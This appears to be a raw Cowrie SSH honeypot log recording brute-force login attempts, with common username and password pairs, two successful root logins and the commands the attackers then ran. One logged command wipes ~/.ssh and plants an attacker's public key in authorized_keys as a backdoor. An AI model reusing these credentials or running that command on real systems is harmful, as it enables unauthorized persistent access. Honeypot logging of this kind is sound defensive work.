{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:55:59.002430Z","src_ip":"212.227.125.160","session":"c31b93643fc1"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:55:59.366873Z","src_ip":"212.227.125.160","session":"c31b93643fc1"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:00.516214Z","src_ip":"212.227.125.160","session":"c31b93643fc1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37974,"dst_ip":"1.2.3.4","dst_port":22,"session":"43a00e7d2497","protocol":"ssh","message":"New connection: 212.227.125.160:37974 (1.2.3.4:22) [session: 43a00e7d2497]","sensor":"my-vps","timestamp":"2025-08-31T00:56:09.127701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:56:09.128371Z","src_ip":"212.227.125.160","session":"43a00e7d2497"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:56:09.202431Z","src_ip":"212.227.125.160","session":"43a00e7d2497"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:56:09.441857Z","src_ip":"212.227.125.160","session":"43a00e7d2497"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:10.578729Z","src_ip":"212.227.125.160","session":"43a00e7d2497"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45364,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa62348f97e9","protocol":"ssh","message":"New connection: 212.227.125.160:45364 (1.2.3.4:22) [session: fa62348f97e9]","sensor":"my-vps","timestamp":"2025-08-31T00:56:19.438049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:56:19.439016Z","src_ip":"212.227.125.160","session":"fa62348f97e9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:56:19.514071Z","src_ip":"212.227.125.160","session":"fa62348f97e9"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q@W3e4r","message":"login attempt [root/!Q@W3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:56:19.898811Z","src_ip":"212.227.125.160","session":"fa62348f97e9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:56:20.145710Z","src_ip":"212.227.125.160","session":"fa62348f97e9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:56:20.146520Z","src_ip":"212.227.125.160","session":"fa62348f97e9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:20.222090Z","src_ip":"212.227.125.160","session":"fa62348f97e9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:20.223291Z","src_ip":"212.227.125.160","session":"fa62348f97e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47410,"dst_ip":"1.2.3.4","dst_port":22,"session":"53bc182c6d56","protocol":"ssh","message":"New connection: 212.227.235.229:47410 (1.2.3.4:22) [session: 53bc182c6d56]","sensor":"my-vps","timestamp":"2025-08-31T00:56:29.516023Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44600,"dst_ip":"1.2.3.4","dst_port":22,"session":"716efbf6a98e","protocol":"ssh","message":"New connection: 212.227.125.160:44600 (1.2.3.4:22) [session: 716efbf6a98e]","sensor":"my-vps","timestamp":"2025-08-31T00:56:29.921051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:56:29.921968Z","src_ip":"212.227.125.160","session":"716efbf6a98e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:56:29.996310Z","src_ip":"212.227.125.160","session":"716efbf6a98e"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-08-31T00:56:30.219911Z","src_ip":"212.227.125.160","session":"716efbf6a98e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:56:30.442945Z","src_ip":"212.227.235.229","session":"53bc182c6d56"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:56:30.443722Z","src_ip":"212.227.235.229","session":"53bc182c6d56"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:31.300176Z","src_ip":"212.227.125.160","session":"716efbf6a98e"}
{"eventid":"cowrie.login.failed","username":"debian","password":"12345","message":"login attempt [debian/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T00:56:35.986053Z","src_ip":"212.227.235.229","session":"53bc182c6d56"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:37.798391Z","src_ip":"212.227.235.229","session":"53bc182c6d56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56750,"dst_ip":"1.2.3.4","dst_port":22,"session":"aff6e4f88cd9","protocol":"ssh","message":"New connection: 212.227.125.160:56750 (1.2.3.4:22) [session: aff6e4f88cd9]","sensor":"my-vps","timestamp":"2025-08-31T00:56:40.452414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:56:40.453132Z","src_ip":"212.227.125.160","session":"aff6e4f88cd9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:56:40.527451Z","src_ip":"212.227.125.160","session":"aff6e4f88cd9"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat123","message":"login attempt [tomcat/tomcat123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:56:40.753627Z","src_ip":"212.227.125.160","session":"aff6e4f88cd9"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:41.885158Z","src_ip":"212.227.125.160","session":"aff6e4f88cd9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59508,"dst_ip":"1.2.3.4","dst_port":22,"session":"e35f77f159e2","protocol":"ssh","message":"New connection: 212.227.235.229:59508 (1.2.3.4:22) [session: e35f77f159e2]","sensor":"my-vps","timestamp":"2025-08-31T00:56:42.095409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:56:42.096279Z","src_ip":"212.227.235.229","session":"e35f77f159e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:56:42.164428Z","src_ip":"212.227.235.229","session":"e35f77f159e2"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd12345678","message":"login attempt [root/abcd12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:56:42.472679Z","src_ip":"212.227.235.229","session":"e35f77f159e2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:56:42.621013Z","src_ip":"212.227.235.229","session":"e35f77f159e2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:56:42.621664Z","src_ip":"212.227.235.229","session":"e35f77f159e2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:56:42.622786Z","src_ip":"212.227.235.229","session":"e35f77f159e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:42.690815Z","src_ip":"212.227.235.229","session":"e35f77f159e2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:56:43.390857Z","src_ip":"212.227.235.229","session":"e35f77f159e2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:56:43.391554Z","src_ip":"212.227.235.229","session":"e35f77f159e2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:56:43.460056Z","src_ip":"212.227.235.229","session":"e35f77f159e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:43.460876Z","src_ip":"212.227.235.229","session":"e35f77f159e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60140,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e1ba0aa0c64","protocol":"ssh","message":"New connection: 212.227.235.229:60140 (1.2.3.4:22) [session: 0e1ba0aa0c64]","sensor":"my-vps","timestamp":"2025-08-31T00:56:43.526871Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:56:43.527682Z","src_ip":"212.227.235.229","session":"0e1ba0aa0c64"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:56:43.593882Z","src_ip":"212.227.235.229","session":"0e1ba0aa0c64"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:56:43.901897Z","src_ip":"212.227.235.229","session":"0e1ba0aa0c64"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:56:44.971915Z","src_ip":"212.227.235.229","session":"0e1ba0aa0c64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60834,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b12eefebc1b","protocol":"ssh","message":"New connection: 212.227.235.229:60834 (1.2.3.4:22) [session: 8b12eefebc1b]","sensor":"my-vps","timestamp":"2025-08-31T00:56:45.035577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:56:45.036401Z","src_ip":"212.227.235.229","session":"8b12eefebc1b"}
